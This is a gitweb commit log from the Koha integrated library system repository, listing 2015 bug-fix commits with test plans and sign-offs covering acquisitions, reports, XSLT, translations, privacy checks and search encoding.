]> git.koha-community.org Git - koha.git/log
koha.git
9 years agoBug 13993: (2) Correct poorly transferred orders
Mark Tompsett [Thu, 16 Apr 2015 13:14:54 +0000 (09:14 -0400)]
Bug 13993: (2) Correct poorly transferred orders

Added Atomic Update to fix poorly transferred orders

TEST PLAN
---------
8) Apply patch (2)
9) Run the database updates
   $ ./installer/data/mysql/updatedatabase.pl
   -- This should run without error
10) prove -v t/db_dependent/Acquisition/TransferOrder.t
    -- This should fail, because the transfer function is still
       not fixed.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit f668a46e23746daa18c5fe8c6005a8661553c645)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 13993: (1) Add tests to confirm 'new' and 'cancelled'
Mark Tompsett [Thu, 16 Apr 2015 12:54:30 +0000 (08:54 -0400)]
Bug 13993: (1) Add tests to confirm 'new' and 'cancelled'

This adds 2 tests to t/db_dependent/Acquisition/TransferOrder.t
in order to confirm the order's status is properly marked.

TEST PLAN
---------
1) Log into staff client
2) Acquisitions
3) Create a basket for two differing vendors.
4) Place an order in one of the baskets.
5) Transfer the order from one vendor's basket to the others.
6) Apply this patch (1) only
7) prove -v t/db_dependent/Acquisition/TransferOrder.t
   -- should fail one test: not marked as 'cancelled'.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit b335b7299120f642a0f7d7654937521df8f75ba6)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14303: Fix item search CSV export - obsolete "by" and display of publication...
Katrin Fischer [Tue, 9 Jun 2015 00:44:48 +0000 (02:44 +0200)]
Bug 14303: Fix item search CSV export - obsolete "by" and display of publication year for MARC21

The exported CSV file from the item search didn't display the publication
year in MARC21 installations and the title always contained 'by'
even if there was no author information to display. Also the by is
not needed by MARC21 as the data should include punctuation.

This basically copies the changes done to the JSON format
on bug 13859 to the CSV include.

To test: Switch from 'Screen' to 'CSV'
- Check publication date always displays (MARC21 and UNIMARC)
- Check that for MARC21 the 'by' has been removed from the title information
- Check that for UNIMARC the 'by' only displays when there is also
  an author to display

Tested for MARC21, works as expected.
Signed-off-by: Marc Véron <veron@veron.ch>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit cd9a827b6928ed0cb80c78ebf897e2d77132296a)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14496: Improving opac-detail.pl performances
Julian FIOL [Mon, 6 Jul 2015 10:27:08 +0000 (12:27 +0200)]
Bug 14496: Improving opac-detail.pl performances

Get notes and subjects from MARC record
ONLY when XSLT is not activated.

It's useless doing it when XSLT is activated,
because XSLT takes care of it by its own.

=> With this patch, we are saving precious
milliseconds

I compared the display of some records in XSLT view with and without patch, was the same (as expected).
Signed-off-by: Marc Veron <veron@veron.ch>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
On a slower server, I saw a time save of 0.0274 to 0.0908 seconds (with XSLT).
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 468d3d9c83a9760e796cdf43c7da2766ccf7c9b9)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14508: 'New patron' dropdown empty list on circulation.pl
Tomas Cohen Arazi [Wed, 8 Jul 2015 21:25:45 +0000 (18:25 -0300)]
Bug 14508: 'New patron' dropdown empty list on circulation.pl

This patch makes includes/patron-toolbar.inc (the one in charge of
rendering the 'New patron' dropdown) make use of the Categories
Template Toolkit plugin to create the list of categories.

(1) To check the setup is sane:
- Go to the Patrons page
=> SUCCESS: The 'New patron' dropdown is populated
- Click on the [+] symbol on the Patron search on the top
=> SUCCESS: The Categories dropdown is populated

(2) To test the patch:
- On the checkout form, perform a patron search that
  (a) returns more than one result
  (b) returns zero results
- Click the dropdown menu to create a new patron
=> FAIL: Dropdown is empty
- Repeat for (a) or (b)
- Apply the patch and reload
=> SUCCESS: The dropdown is correctly populated
- Repeat (1)
=> SUCCESS: Nothing got broken
- Verify the logs
=> SUCCESS: No new warnings
- Sign off :-D
- Get a cookie
- Smile

Regards

Discussion: we might need a new bug to start cleaning stuff like this:

@categories=C4::Category->all;
if(scalar(@categories) < 1){
    $no_add = 1;
    $template->param(no_categories => 1);
}
else {
    $template->param(categories=>\@categories);
}

but it belongs to a new bug me thinks. Well, suggestions are welcome, but this must
be fixed on stable ASAP so hurry :-D

Followed test plan, works as expected.
Signed-off-by: Marc Véron <veron@veron.ch>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 5a57b3c163e6609aa99ab34e906aa05bd033d5ff)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14424: Add on site checkouts help for 3.20
Nicole C. Engard [Tue, 23 Jun 2015 19:49:55 +0000 (14:49 -0500)]
Bug 14424: Add on site checkouts help for 3.20

There is no help for the pending on site checkouts report. This patch
adds it.

To test:

* visit pending on site checkouts
* click help
* confirm help is there and correct

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit c00c6e3c675da7f244d5042e1ba9be4648bd4ee9)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14424: Update Acq Help for 3.20
Nicole C. Engard [Tue, 23 Jun 2015 19:44:11 +0000 (14:44 -0500)]
Bug 14424: Update Acq Help for 3.20

This patch adds the missing order from subscription help and updates basket
help.

To test:

* Visit a basket, review the help
* Click order from a subscrption, review the help

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 4e271637cd64ef733fadb231be51f22146a1a9e8)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14424: Update Discharge Help for 3.20
Nicole C. Engard [Tue, 23 Jun 2015 19:31:15 +0000 (14:31 -0500)]
Bug 14424: Update Discharge Help for 3.20

This patch adds the missing discharge help file and updates the moremember file with
info on discharges.

To test:

* Visit a patron
* View and confirm help is right
* Visit the discharge page on the patron
* Confirm help file loads and is right

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit a350d02b995483bdd3bc7ede2271ad8a17190acc)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14424: Update cataloging help for 3.20
Nicole C. Engard [Tue, 23 Jun 2015 18:00:06 +0000 (13:00 -0500)]
Bug 14424: Update cataloging help for 3.20

This patch updates 3 help files for catalolging in 3.20

To test:

* Visit
 * cataloging home
 * cataloging a new record
 * mergin bib records
* Confirm text is right and visible

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit ddd2ec87523b1d5379c8a021347fa600ddd66cc2)

9 years agoBug 14424: Patron Help Files for 3.20
Nicole C. Engard [Tue, 23 Jun 2015 17:45:17 +0000 (12:45 -0500)]
Bug 14424: Patron Help Files for 3.20

This patch updates the help files for 3.20

To test:

* Visit
 * Main patron page
 * Patron search page
 * Patron permissions page
* Confirm the text is right on all three

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 274942abbd299e39ba75b947023bdc881d4a54b4)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14485: HTML comment disables translation in cataloguing/addbooks.tt
Fridolin Somers [Thu, 2 Jul 2015 08:37:22 +0000 (10:37 +0200)]
Bug 14485: HTML comment disables translation in cataloguing/addbooks.tt

In cataloguing/addbooks.tt, the line :
  [% total %] result(s) found in catalog,
is not present in PO files even after an update.
I've found that the cause is the previous HTML comment line.

This patch converts HTML comment into TT comment and adds a div to have a more comprehensive string to translate.

Test plan :
- without patch
- go into <sources>/misc/translator
- run PO update for example in french : translate update fr-FR
=> the text "result(s) found in catalog" is missing from PO file : fr-FR-staff-prog.po
- restore default PO files
- apply patch
- go into <sources>/misc/translator
- run PO update for example in french : translate update fr-FR
=> You find text "result(s) found in catalog" in PO file : fr-FR-staff-prog.po

Sponsored-by: Universidad de El Salvador
Signed-off-by: Hector Eduardo Castro Avalos <hector.hecaxmmx@gmail.com>
Works as advertised. Just one msgid appear with msgid "%s result(s) found in catalog,"

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit e2ab42716825c5dedbb0036ae56a28e6119083f5)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14366: Units doesn't get saved usefully for patroncards
David Cook [Tue, 9 Jun 2015 04:25:23 +0000 (14:25 +1000)]
Bug 14366: Units doesn't get saved usefully for patroncards

This patch causes the "Units" to be saved and displayed correctly
for the "Edit layout" screen in Patroncards.

_TEST PLAN_

Before applying:
0) Create a new layout
1) Edit the layout, change the units, and click Save
2) Edit the layout again, and notice the units are still "PostScript Points"

Apply the patch:
3) Edit the layout again, change the units, and click Save
4) Edit the layout again, note that the units have changed to your
selection

5) Rejoice

Signed-off-by: Nick Clemens <nick@quecheelibrary.org>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit f573a155974c84a6fb433bff86a220d4644ad27e)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 13950: Sort Item search home library list by branch name
Nick Clemens [Wed, 17 Jun 2015 01:48:18 +0000 (21:48 -0400)]
Bug 13950: Sort Item search home library list by branch name

On the item search form the list of home libraries isn't sorted
alphabetically by their descrption.

To test:
- Ensure that you have libraries whose code/name are sorted in a different alphabetical order (e.g. Aardvark/ZZZ & Zebra/AAA)
- Staff: Advanced search - item search
- See that libraries are sorted in code order
- Apply patch
- Verify selection block for home library is correctly sorted after
  applying the patch.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 958be9804a50c3e13f74c4d5f81348e2256a8042)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14163: Acq - receive shipment and order from staged: rename 'Show all' to 'Show...
Katrin Fischer [Sun, 31 May 2015 13:52:26 +0000 (15:52 +0200)]
Bug 14163: Acq - receive shipment and order from staged: rename 'Show all' to 'Show inactive'

'Show all' in acquisition makes the inactive funds in the fund list
box visible. This patch changes the text to 'Show inactive' to be more
clear about the functionality.

Patch changes 2 pages. To test:

1) Order from staged file
- make sure you have uploaded a few records via the tools
- create a new order using the 'From a staged file' option
- select a file to order from - 'Add orders'
- Verify the 'Select to import' tab now displayed the text
  'Show inactive funds' and that it works as expected
- Switch to the 'Default accounting details' tab
- Verify the text there is also changed to 'Show inactive' and
  works like expected.

2) Receive shipment
- receive a new shipment for a vendor with unreceived orders
- Verify the label next to the fund list has changed to
  'Show inactive' and works as expected.

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Simple string change, no errors.

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 83387bf3b1d9eb8710e184269338361ac1477d1c)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14163: Acq order form: rename 'Show all' to 'Show inactive'
Katrin Fischer [Mon, 25 May 2015 08:45:54 +0000 (10:45 +0200)]
Bug 14163: Acq order form: rename 'Show all' to 'Show inactive'

On the order form there is a checkbox next to the fund list labelled
'show all'. Checking the checkbox will result in the inactive funds
showing in the pull down list as well.

The patch renames the label to 'Show inactive' to make the purpose
more clear.

To test:
- Create a new order
- Verify the label has changed as described above
- Decide if the change makes sense

Signed-off-by: tadeasm <tadeas.moravec@gmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 8eb049a6a1697f8b2cd23cd660d508ad1ef629e7)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14453: (followup) Fix shipped XSLT files
Mirko Tietgen [Thu, 25 Jun 2015 13:38:42 +0000 (15:38 +0200)]
Bug 14453: (followup) Fix shipped XSLT files

Make the shipped XSLTs for authorities (MARC21 and UNIMARC) the same as the generated version

Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit fbe25b1d8e1806768b04d829bd9fc1a05f4861cf)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14453: kohaidx is missing for id in authority-koha-indexdefs.xml
Fridolin Somers [Wed, 24 Jun 2015 14:06:05 +0000 (16:06 +0200)]
Bug 14453: kohaidx is missing for id in authority-koha-indexdefs.xml

In authority-koha-indexdefs.xml, all tags use the namespace "kohaidx" except the tag "id".

When re-generating authority-zebra-indexdefs.xsl, the line :
  <xslo:variable name="idfield" select="normalize-space(marc:controlfield[@tag='001'])"/>
is modified :
  <xslo:variable name="idfield" select="normalize-space()"/>
This is an error.

This patch adds kohaidx namespace to correct.

Test plan :
- Without patch
- go to etc/zebradb/marc_defs/marc21/authorities/
- run : xslproc xsltproc ../../../xsl/koha-indexdefs-to-zebra.xsl authority-koha-indexdefs.xml > authority-zebra-indexdefs.xsl
- read authority-zebra-indexdefs.xsl
=> the line has changed : <xslo:variable name="idfield" select="normalize-space()"/>
- Apply patch
- go to etc/zebradb/marc_defs/marc21/authorities/
- run : xslproc xsltproc ../../../xsl/koha-indexdefs-to-zebra.xsl authority-koha-indexdefs.xml > authority-zebra-indexdefs.xsl
- read authority-zebra-indexdefs.xsl
=> the line has not changed
(same for unimarc flavor)

Signed-off-by: Mirko Tietgen <mirko@abunchofthings.net>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
As Mirko mentioned, the xslt's now generate the facet-processing templates in
the authority xslt's too. They are harmless because we don't define facets
for authority records. If we did, it would be harmless too.

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 2365537eea9d5cd6526843b1cd0c2152a6def06c)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14326: XSLT Syntax error in MARC21slimOPACResults.xsl
Winona Salesky [Thu, 4 Jun 2015 02:46:23 +0000 (22:46 -0400)]
Bug 14326: XSLT Syntax error in MARC21slimOPACResults.xsl

Test Plan:
1) Apply this patch
2) Ensure you are using the default XSLT setting for the staff and opac  record details
3) Perform an opac search check "Availability" for expected display values.
5) Note this patch corrects invalid syntax in xslt, there should be no visable changes to the results page.

Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 058b50de5b09ee2ba3efc953b9846bc79d712c31)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14135: Adds 'Free' to variabletypes in systempreferences.tt
Indranil Das Gupta [Mon, 4 May 2015 13:25:15 +0000 (18:55 +0530)]
Bug 14135: Adds 'Free' to variabletypes in systempreferences.tt

The 'Local Use' system preference addition/modification template provides the following options against "Variable Type" - Choice, YesNo, Integer, Textarea, Float, Themes, Languages, Upload or ClassSource.

There is no option presented for "Free" which seems to be the most
used variable type out-of-the-box (i.e. INTRAdidyoumean,
OPACdidyoumean, UsageStatsID and UsageStatsLastUpdateTime)

This trivial patch proposes to modify the systempreferences.tt
and add the option 'Free' to the list offered to users.

Test Plan
=========

1/ Go to Home > Administration > System preferences > Local use
2/ Click on 'New preference'.
3/ In the fieldset 'Koha Internal', the variable types offered
   are Choice, YesNo, Integer, Textarea, Float, Themes,
   Languages, Upload or ClassSources.
4/ Clicking on 'Choice' should set the 'preftype' field as
   'Choice'.
5/ Apply this patch.
6/ Refresh the page.
7/ The variable types list should read - "Free, Choice, YesNo,
   Integer, Textarea, Float, Themes, Languages, Upload or
   ClassSources".
8/ Clicking on 'Free' should set the 'preftype' field as 'Free'.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
NOTE: Discovered that there is no validation on the type field.
      However, that is beyond the scope of this bug.

Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 9f008a102415c8b71a1f4a976bc15691c2663b5c)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14382: [QA Follow-up] Bad regex alarm
Marcel de Rooy [Fri, 3 Jul 2015 09:02:22 +0000 (11:02 +0200)]
Bug 14382: [QA Follow-up] Bad regex alarm

The regex /|date>>/ will match much more than you like :)
The unescaped pipe is bad, but you also need to remove the >> because
the split a few lines above it removes them already.

This allows you to recover from an error like this one, running another
report with a string parameter:
The given date (india%) does not match the date format (us) at
Koha/DateUtils.pm line 144.

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Amended for possible spaces around the word date.
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit bfea40b6e8161629c11d97be5eeba56fb6d59ba3)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14382: Non-ISO Date parameters generate empty reports.
Mark Tompsett [Wed, 24 Jun 2015 16:13:46 +0000 (12:13 -0400)]
Bug 14382: Non-ISO Date parameters generate empty reports.

The issue is that SQL expects ISO dates, but the user may wish to view dates according to the dateformat system preference.

By detecting a date preference, the non-ISO dates can be converted to ISO dates before being stuffed back into the SQL query to be executed.

TEST PLAN
---------
1) Add a report with date parameters.
   -- I used 'Holds placed in date range' from
      http://wiki.koha-community.org/wiki/SQL_Reports_Library
2) Set your dateformat to YYYY-MM-DD
3) Run the report
   -- Note the SQL reads
      "... BETWEEN '{date formatted in YYYY-MM-DD}'..."
   -- If there is supposed to be data, there is some.
4) Set your dateformat to MM/DD/YYYY
5) Run the report
   -- Note the SQL reads
      "... BETWEEN '{date formatted in MM/DD/YYYY}'..."
   -- If there is supposed to be data, there is none.
6) Apply patch
7) Repeat steps 2-5
   -- The SQL will always read YYYY-MM-DD (ISO) format.
   -- The report will have data, if there is some.
8) koha qa test tools.

Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Adding a QA follow-up.
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit c3fea53039a6c53c766b0403eedd57f644c6f772)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
Conflicts:
reports/guided_reports.pl

9 years agoBug 14427: Use Koha::version instead of C4::Context->KOHAVERSION
Mark Tompsett [Fri, 19 Jun 2015 18:00:13 +0000 (14:00 -0400)]
Bug 14427: Use Koha::version instead of C4::Context->KOHAVERSION

While testing bug 9006, I discovered this gem in
installer/install.pl

TEST PLAN
---------
 1) back up DB
 2) drop db and create db
 3) git reset --hard origin/3.20.x
 4) run web installer and all sample data
 5) git reset --hard origin/master
 6) empty your koha intranet error log
 7) run web installer to upgrade
    -- there will be warnings regarding regex around
       installer/install.pl line 328 or so.
       grep "\$kohaversion" ~/koha-dev/var/logs/koha-error_log
 8) repeat steps 2-6
 9) apply this patch
10) run web installer to upgrade
    -- no regex warnings.
       grep "\$kohaversion" ~/koha-dev/var/logs/koha-error_log
11) koha qa test tools

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 5f3ec7109321f8e928371880e473e84d8db39f8d)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 9942 : Bumping database version
Chris Cormack [Mon, 13 Jul 2015 23:54:57 +0000 (11:54 +1200)]
Bug 9942 : Bumping database version

9 years agoBug 9942: [QA Followup] - Add test and alert to returns.pl
Kyle M Hall [Thu, 25 Jun 2015 21:22:25 +0000 (17:22 -0400)]
Bug 9942: [QA Followup] - Add test and alert to returns.pl

Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit efedadebf233cf7f2b8c1eb64d1687b282d94474)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 9942: Make Koha fail if privacy is not respected
Jonathan Druart [Thu, 9 Apr 2015 11:07:05 +0000 (13:07 +0200)]
Bug 9942: Make Koha fail if privacy is not respected

If a patron has requested anonymity on returning items and the system is
not correctly configured (AnonymousPatron no set or set to an inexistent
patron), the application should take it into account and not fail
quietly.

This patch is quite radical: the script will die loudly if the privacy
is not respected.

To be care of the bad "Software error", some checks are done in the
updatedatabase to be sure the admin will be warned is something is wrong
in the configuration.

Test plan:
1/ Test the updatedatabase entry:
a. Turn on OPACPrivacy and set AnonymousPatron to an existing patron
=> You will get a warning
b. Turn on OPACPrivacy and set AnonymousPatron to 0 or ''
=> You will get a warning
c. Turn on OPACPrivacy and set the privacy to 2 (Never) for at least 1 patron
Turn off OPACPrivacy
=> You will get a warning
d. In all other cases you will get no error

2/ Test the interface
a. Turn on OPACPrivacy and set the privacy to 2 (Never) for a patron
b. Now you can turn off OPACPrivacy or keep it on, behavior should be
the same
c. check an item out the patron
d. Check the item in using the check out table
=> fail
e. Check the item in using the Check in tab
=> fail (not gracefully).

Note that the software error could appear on other pages too.

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Updatedatabase works as described
On staff, if don't have correct settings for anonymity it's
impossible to check-in (with OPACPrivacy on)
No errors

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 94315f663b8a582fb7ef68de2bd9c3933901cd7f)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14431: FIX encoding issues in search (staff client)
Jonathan Druart [Mon, 22 Jun 2015 10:45:50 +0000 (12:45 +0200)]
Bug 14431: FIX encoding issues in search (staff client)

Note that this does not appears at the OPAC.

We will need 2 different testers here, the results seem to depend on the
Encode version.

0/ Determine your Encode version (`pmvers Encode`).
If you have 2.60:
1) /cgi-bin/koha/catalogue/search.pl?q=ééé&op=Submit
You should get
" No results match your search for 'kw,wrdl: ���' in my library Catalog."
2) /cgi-bin/koha/catalogue/search.pl?q=ກ
You should get
Cannot decode string with wide characters at
/usr/lib/i386-linux-gnu/perl/5.20/Encode.pm line 215.

If you have <2.60 (? not sure here):
1) /cgi-bin/koha/catalogue/search.pl?q=ééé&op=Submit
You should not get encoding problems.
2) /cgi-bin/koha/catalogue/search.pl?q=ກ
You should not get encoding problems.

Apply this patch, try again 1 and 2.
If the Encode version is >=2.60, the encoding issues should be fixed.
If not, please detail if there are any regression.

NOTE: Tested on Ubuntu 14.04, Debian 8, and Debian 7. See comment #3.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit ffedc98577f4967181e9a17886483c6ac5a1d140)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14467: Security updates break some Koha plugins
Kyle M Hall [Thu, 25 Jun 2015 20:41:23 +0000 (16:41 -0400)]
Bug 14467: Security updates break some Koha plugins

The new security updates break previously functioning plugins, most
notably the cover flow plugin and the Ebsco EDS plugin.

Test Plan:
1) Install and configure the cover flow plugin ( http://bywatersolutions.com/koha-plugins/ )
2) Note that attempting to access coverflow.pl from the OPAC results in an error
3) Apply this patch
4) Note that coverflow.pl now output html again

Signed-off-by: Nick Clemens <nick@quecheelibrary.org>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit e0d2bc669e385cfd1c42c1e83aaff3495a75a822)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14389: Editing a syspref in a textarea does not enable the Save button
Liz Rea [Tue, 16 Jun 2015 04:12:57 +0000 (16:12 +1200)]
Bug 14389: Editing a syspref in a textarea does not enable the Save button

Test plan:
  1. Navigate to the "opaccredits" syspref (or any other textarea, i.e.,
     "Click to Edit", syspref) in the system preferences editor.
  2. Change its contents, by either pasting or typing. The field may not
     be marked as modified, even after you click outside the box.
  3. Apply the patch.
  4. Reload the page and try again; either pasting or typing should mark
     the field as changed and allow you to save.

Signed-off-by: Jesse Weaver <pianohacker@gmail.com>
Confirmed working for normal input, paste and middle-click paste in
Chrome and Firefox in Linux.

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit c95e794bd458377d742280ae8fff281ddf395e04)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14490: Duplicate armenian translator
Samanta Tello [Fri, 3 Jul 2015 14:12:05 +0000 (11:12 -0300)]
Bug 14490: Duplicate armenian translator

This patch fix trivial duplicate
in about page.

To test:
1) Go to about page > translations
2) Check duplicate entry for Armenian
first in 4th line, second before indonesian
3) Apply patch
4) Reload page and check again

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Trivial string patch. The restults are the expected.

Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Double checked :-P

(cherry picked from commit d12b4e0b19d43e10a06a934689b9001bdd9049f4)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14002: Display readonly values as plain text
Jonathan Druart [Tue, 16 Jun 2015 17:25:58 +0000 (19:25 +0200)]
Bug 14002: Display readonly values as plain text

There is no need to display the cardnumber and expiration date values in
a disabled input.

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit f194bca26891a338761f5a4041b0886f87631e27)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14002: Show patron expiry date in OPAC
Katrin Fischer [Tue, 9 Jun 2015 22:52:39 +0000 (00:52 +0200)]
Bug 14002: Show patron expiry date in OPAC

This patch makes it possible to show the expiration date
of a patron account in the OPAC on the details tab in the
patron account.

Extras:
- Makes it possible to hide cardnumber with
  PatronSelfRegistrationBorrowerUnwantedField

To test:
- Toggle OPACPatronDetails and test date expiry always shows
- Check PatronSelfRegistrationBorrowerUnwantedField for dateexpiry
  and cardnumber
- Verify a patron address modification request still works
  as expected

Signed-off-by: Aleisha <aleishaamohia@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 69baa022a587ffd9df2bc065a0e8e72c14cf7c4f)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14439: Add test - template path should finish by .tt
Jonathan Druart [Tue, 23 Jun 2015 14:10:22 +0000 (16:10 +0200)]
Bug 14439: Add test - template path should finish by .tt

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit cbf3c9aa40c13f15a704945f7d6ceaf3aab4b3f0)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14439: Typo in Bug 14408 regexp
Fridolin Somers [Tue, 23 Jun 2015 13:50:39 +0000 (15:50 +0200)]
Bug 14439: Typo in Bug 14408 regexp

In Bug 14408 first patch, the regexp used needs an escape on dot and does not need an ending "?"

Test plan :
  - prove t/db_dependent/Auth.t

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit cb44a8de3a6fbe7ecf2d349a6cab44ace0dc7165)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
